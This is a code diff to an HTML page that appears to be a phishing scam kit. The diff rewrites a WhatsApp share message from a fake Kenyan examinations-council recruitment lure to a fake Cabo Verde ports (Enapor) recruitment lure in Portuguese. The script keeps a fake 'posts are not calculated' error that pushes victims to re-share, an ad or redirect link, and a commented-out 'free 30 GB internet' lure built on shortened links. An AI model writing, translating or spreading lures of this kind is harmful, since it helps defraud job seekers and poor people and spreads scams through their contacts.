--- a/Enapor.html
+++ b/Enapor.html
@@ -565,10 +565,10 @@ $(document).click(function () {
 "*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
     <script>
-        var text1 = "*Kenya National Examinations Council 2024 Recruitment*%0A%0AThe application portal for the Kenya National Examinations Council (KNEC) 2024 recruitment is open.%0A%0AClick the link below to apply now.%0A%0AApply Here%0Ahttps://knec.ac.ke.listagency.xyz/",
+        var text1 = "*Recrutamento Enapor-Portos de Cabo Verde 2024*%0A%0AEstá aberto o portal de candidaturas ao recrutamento Enapor-Portos de Cabo Verde 2024.%0A%0AClique no link abaixo para se inscrever já.%0A%0AInscreva-se aqui%0Ahttps://recruit-hub1.github.io/Enapor1/enapor1/",
             text2 = " an amount of ",
-            text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
-            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
+            text3 = "para cada cidadão que reúna as condições como uma ajuda à classe pobre para ultrapassar a crise. Entre e registe-se agora e certifique-se de que se regista corretamente👉 ",
+            error = "Algo está errado!\nAs publicações não são calculadas. Pode ter partilhado com o mesmo amigo ou grupo mais do que uma vez, partilhe novamente",
             abcde = "https://ak.jeekomih.com/4/3156656",
             saved = "",
             share = "whatsapp://send?text=" + text1;
